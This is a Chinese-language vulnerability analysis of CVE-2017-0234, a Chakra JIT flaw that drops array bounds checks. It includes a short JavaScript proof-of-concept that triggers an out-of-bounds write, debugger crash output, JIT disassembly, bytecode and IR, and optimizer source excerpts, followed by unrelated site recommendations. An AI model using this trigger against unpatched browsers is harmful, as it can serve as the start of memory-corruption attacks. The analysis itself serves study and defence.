CVE-2017-0234 漏洞分析

漏洞概述

该漏洞是由于 Chakra 引擎在优化过程中过于激进,删除了数组的边界检查而导致的数组越界漏洞

漏洞样本

漏洞样本从 yuange 那里的分析文档中获得

function write(begin,end,step,num)
{
 for(var i=begin;i<end;i+=step) view[i]=num;
}

var buffer =  new ArrayBuffer(0x10000);
var view   =  new Uint32Array(buffer);

write(0,0x4000,1,0x1234);

write(0x3000000e,0x40000010,0x10000,1851880825);

简要分析

在调试环境中打开样本,Edge 崩溃在如下位置,崩溃点及部分调用栈如下所示

0:018> r
rax=000100006e617579 rbx=000001c27ff90000 rcx=0000000000000005
rdx=000001ba16817fc0 rsi=000001ba057458a4 rdi=000000a3770fbe50
rip=000001ba058c013c rsp=000000a3770fbb40 rbp=000000a3770fbbe0
 r8=0000000000010000  r9=000000003004000e r10=0000000040000010
r11=0000000000000001 r12=000000006e617579 r13=000100006e617579
r14=0001000040000010 r15=000100003000000e
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
000001ba`058c013c 4689248b        mov     dword ptr [rbx+r9*4],r12d ds:000001c3`40090038=????????
0:018> k
Child-SP          RetAddr           Call Site
000000a3`770fbb40 00007ff8`c9d1613a 0x000001ba`058c013c
000000a3`770fbbf0 00007ff8`c9d14d38 chakra!Js::InterpreterStackFrame::DoLoopBodyStart+0x30a
000000a3`770fbcb0 00007ff8`c9d1431e chakra!Js::InterpreterStackFrame::ProfiledLoopBodyStart<0,1>+0x48
000000a3`770fbd10 00007ff8`c9d1a6c8 chakra!Js::InterpreterStackFrame::OP_ProfiledLoopStart<0,1>+0xbe
000000a3`770fbd60 00007ff8`c9d16f23 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x538
000000a3`770fbdc0 00007ff8`c9e1ec1d chakra!Js::InterpreterStackFrame::Process+0x143
000000a3`770fbe20 00007ff8`c9e1e71a chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4bd
000000a3`770fc180 000001ba`159d0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x5a

可以看出,程序崩溃在一段 JIT 代码中,根据调用栈可以看出程序是在调用 Loop 的过程中崩溃的,即发生在处理
for(var i=begin;i<end;i+=step) view[i]=num; 语句的过程中。查看JIT 代码

// ......
000001ba`058c0120 453bca          cmp     r9d,r10d
000001ba`058c0123 7d42            jge     000001ba`058c0167
000001ba`058c0125 498bc5          mov     rax,r13
000001ba`058c0128 4c8bd8          mov     r11,rax
000001ba`058c012b 49c1eb30        shr     r11,30h
000001ba`058c012f 4983fb01        cmp     r11,1
000001ba`058c0133 0f85eb010000    jne     000001ba`058c0324
000001ba`058c0139 448be0          mov     r12d,eax
000001ba`058c013c 4689248b        mov     dword ptr [rbx+r9*4],r12d ds:000001c3`40090038=????????
// ......

结合上面给出的崩溃时寄存器信息可以看出 ,r9 为 write(0x3000000e,0x40000010,0x10000,1851880825); 中第一个参数,这里 JIT 代码中并未进行任何边界判断,直接将 r9 当作数组下标进行访问,导致越界访问的发生。

一般情况下对于数组下标的访问均应先验证下标合法性,但是此处的 JIT 代码却没有这一部分。问题应该出在 JIT 代码产生的阶段

这里对说关于 JIT 代码的生成多说一些。

在 Chakra 引擎首先以解释器的形式执行 js 代码, 即将代码编译成为 byteCode,接着按字节顺序解析执行 byteCode 。 举例来说,如下所示一段 js 代码,Chakra 会首先将其变成 byteCode 的形式

 for(var i=0;i<0x10000;i++)
 {
        view[index]=num;
 }

生成的 byteCode 如下所示

// byte code
0x00000000000A8B70  a8 07 47 07 02 eb 00 ec 00 12 03 00 07 03 09 12  ?.G..?.?........
0x00000000000A8B80  00 6b 00 00 00 00 08 9b 06 08 05 00 00 28 07 07  .k.....?.....(..
0x00000000000A8B90  09 e4 ff ed 00 a8 00 24 00 00 00 00 00 00 00 00  .?.?.?.$........
0x00000000000A8BA0  c0 29 f7 01 00 00 00 00 80 bf ce 01 00 00 00 00  ?)?.....€??.....
0x00000000000A8BB0  50 fa cd 01 00 00 00 00 40 85 0a 00 00 00 00 00  P??.....@?......
0x00000000000A8BC0  10 e1 a5 d9 fe 07 00 00 00 00 00 00 00 00 00 00

eb 00                    Js::InterpreterStackFrame::OP_ProfiledLoopBodyInit
ec 00                    Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart
12 03 00  07 03          Js::JavascriptOperators::Less
09 12 00                 Js::InterpreterStackFrame::OP_Br
6b 00 00 00 00 08        Js::InterpreterStackFrame::OP_ProfiledGetRootProperty
9b 06 08 05 00 00        Js::InterpreterStackFrame::OP_ProfiledSetElementI   
28 07 07                 Js::JavascriptMath::Increment 
09 e4 ff                 Js::InterpreterStackFrame::OP_Br

每个 byteCode 对应不同的处理函数,这个过程由函数 InterpreterStackFrame::ProcessProfiled 进行。对于循环体来说每次进入循环体都会先进入 OP_ProfiledLoopBodyStart 函数,用于记录循环的次数等信息。当一段 Loop 代码被执行了超过一定次数之后,便会进行 JIT 以优化程序的执行效率。

为了不影响 js 的正常执行 JIT 过程由一个独立的线程进行。JIT 线程首先以解释器的形式根据 byteCode 生成中间代码 IR,IR 是一系列指令的集合,构成一个双向链表。上文中的 byteCode 生成的 IR 如下所示

// OP_CODE

FunctionEntry(0x0155)
Label(0x0154)
Ld_I4(0x01bc)
ArgIn_A(0x01c1)
LdSlot(0x008c)
LdSlot(0x008c)
LdSlot(0x008c)
Ld_A(0x0047)
Ld_I4(0x01bc)
Ld_I4(0x01bc)
Ld_I4(0x01bc)
InitLoopBodyCount(0x01e1)
Br(0x0009)
Label(0x0154)
Ld_A(0x0047)
Ld_A(0x0047)
LdRootFld(0x006a)
Ld_A(0x0047)
BailOnNotEqual(0x0205)
FromVar(0x01b7)
FromVar(0x01b7)
BailOnNotArray(0x0210)
LdIndir(0x01c0)
BoundCheck(0x01dd)
BoundCheck(0x01dd)
LdIndir(0x01c0)
BailTarget(0x020a)
Label(0x0154)
StatementBoundary(0x0157)
IncrLoopBodyCount(0x01e2)
ByteCodeUses(0x0217)
BrGe_I4(0x0181)
Label(0x0154)
StatementBoundary(0x0157)
ByteCodeUses(0x0217)
Ld_A(0x0047)
NoImplicitCallUses(0x0219)
ByteCodeUses(0x0217)
StElemI_A(0x009a)
StatementBoundary(0x0157)
Incr_A(0x0028)
Br(0x0009)
Label(0x0154)
StatementBoundary(0x0157)
Ld_I4(0x01bc)
StSlot(0x01cf)
StLoopBodyCount(0x01e3)
Ret(0x0024)
Label(0x0154)
FunctionExit(0x0156)

接着 OP_Code (IR) 经一系列处理之后进入编译阶段生成最终的 JIT 代码。 JIT 代码生成之后 OP_ProfiledLoopBodyStart 函数便不会继续解释器模式而是直接跳转到 JIT 代码中执行。

查看 JIT 代码生成函数 Func::TryCodegen ,可以发现在函数实际生成 JIT 代码前会根据 函数流图 对程序进行优化

TryCodegen
{
            // .....
            IRBuilder irBuilder(this);
            irBuilder.Build()
            // ......
            this->m_fg = FlowGraph::New(this, &fgAlloc);
            this->m_fg->Build();
            GlobOpt globOpt(this);
            globOpt.Optimize();
            // ......
            Encoder encoder(this);
             encoder.Encode();
}

其中OptArraySrc 用于对函数中用到的数组对象进行优化,注意到有如下代码,当 baseValueType (数组操作数的类型)是一个 VirtualTypedArray 时便可以通过优化检测,将 eliminatedLowerBoundCheckeliminatedUpperBoundCheckcanBailOutOnArrayAccessHelperCall 优化标记设置。从而在其后产生代码时直接删除对与 Array 的下标检测。导致问题的发生。

// ......
    if (baseValueType.IsLikelyOptimizedVirtualTypedArray() && !Js::IsSimd128LoadStore(instr->m_opcode) /*Always extract bounds for SIMD */)
    {
        if (isProfilableStElem ||
            !instr->IsDstNotAlwaysConvertedToInt32() ||
            ((baseValueType.GetObjectType() == ObjectType::Float32VirtualArray ||
                baseValueType.GetObjectType() == ObjectType::Float64VirtualArray) &&
                !instr->IsDstNotAlwaysConvertedToNumber()
                )
            )
        {
               eliminatedLowerBoundCheck = true;
               eliminatedUpperBoundCheck = true;
               canBailOutOnArrayAccessHelperCall = false;
        }
// ......

实际调试时可以发现程序在解析 StElemI_A 函数时会进入到此处优化判断, StElemI_A 相关 bytecode 如下

9b 06 08 05 00 00        Js::InterpreterStackFrame::OP_ProfiledSetElementI  srcSlot(byte) baseSlot(byte) indexSlot(byte) profileId(word)

而参与优化检测的值 baseValueType 来源为 baseSlot(byte)

    Value *const baseValue = FindValue(baseOpnd->m_sym);
    if(!baseValue)
    {
        return;
    }
    ValueInfo *baseValueInfo = baseValue->GetValueInfo();
    ValueType baseValueType(baseValueInfo->Type());

Reference

[1] http://slab.qq.com/news/tech/1572.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,736评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,167评论 1 291
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,442评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,902评论 0 204
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,302评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,573评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,847评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,562评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,260评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,531评论 2 245
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,021评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,367评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,016评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,068评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,827评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,610评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,514评论 2 269

推荐阅读更多精彩内容

  • 来源:NumPy Tutorial - TutorialsPoint 译者:飞龙 协议:CC BY-NC-SA 4...
    布客飞龙阅读 31,041评论 6 96
  • 婚丧嫁娶、老人过寿喝粉汤是我们老家甘肃定西的一项风俗~一碗粉汤也勾起了我儿时的回忆。~题记 2017年9月28日,...
    jwyyw雯阅读 636评论 3 3
  • 乌尔姆是德国的一个小城市,位于莱茵河边,在德国慕尼黑,法兰克福游览后预定的住宿地之一,这天玩得很晚,九点多从法...
    冰城老太____孙景芝阅读 522评论 6 12
  • 题目 描述 分割一个整数数组,使得奇数在前偶数在后。 样例 给定 [1, 2, 3, 4],返回 [1, 3, 2...
    悠扬前奏阅读 250评论 0 0